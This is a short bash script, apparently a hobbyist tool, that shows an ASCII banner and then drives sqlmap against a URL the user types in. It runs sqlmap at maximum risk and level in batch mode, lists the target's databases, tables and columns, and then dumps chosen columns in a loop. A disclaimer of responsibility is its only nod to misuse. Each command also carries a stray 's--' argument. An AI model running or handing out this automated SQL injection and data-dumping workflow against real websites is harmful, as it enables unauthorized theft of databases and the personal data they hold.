#!/bin/bash
b="\33[34;3m"
r="\33[31;1m"
g="\33[32;1m"
y="\33[33;1m"
cyan="\33[36;1m"
wh="\33[43;0m"
clear
echo "
 	      Tool By Sh1ark
          
     ██████  ██░ ██  ▄▄▄       ██▀███   ██ ▄█▀
   ▒██    ▒ ▓██░ ██▒▒████▄    ▓██ ▒ ██▒ ██▄█▒ 
   ░ ▓██▄   ▒██▀▀██░▒██  ▀█▄  ▓██ ░▄█ ▒▓███▄░ 
     ▒   ██▒░▓█ ░██ ░██▄▄▄▄██ ▒██▀▀█▄  ▓██ █▄ 
   ▒██████▒▒░▓█▒░██▓ ▓█   ▓██▒░██▓ ▒██▒▒██▒ █▄
   ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒ ▒▒   ▓▒█░░ ▒▓ ░▒▓░▒ ▒▒ ▓▒
   ░ ░▒  ░ ░ ▒ ░▒░ ░  ▒   ▒▒ ░  ░▒ ░ ▒░░ ░▒ ▒░
                                            
            Press EnTer  To continue
"
read VB


echo "
|*Hit*|I do not take any responsibility for any misuse of this script !|"
read -p "URL :" sql
sleep 0.5
sqlmap -u $sql --dbs s-- --risk=3 --level=3 --batch
read -p "If The Database Showing In Terminal Enter it : " ter
sqlmap -u $sql -D $ter --tables s-- --risk=3 --level=3 --batch
read -p "Choose A Table : " col
sqlmap -u $sql -D $ter -T $col --columns s-- --risk=3 --level=3 --batch
while :
do
read -p "Choose Column : " colm
sqlmap -u $sql -D $ter -T $col -C $colm --dump s-- --risk=3 --level=3 --batch
echo "[INFO] Finished ! Happy Sharking |"
done
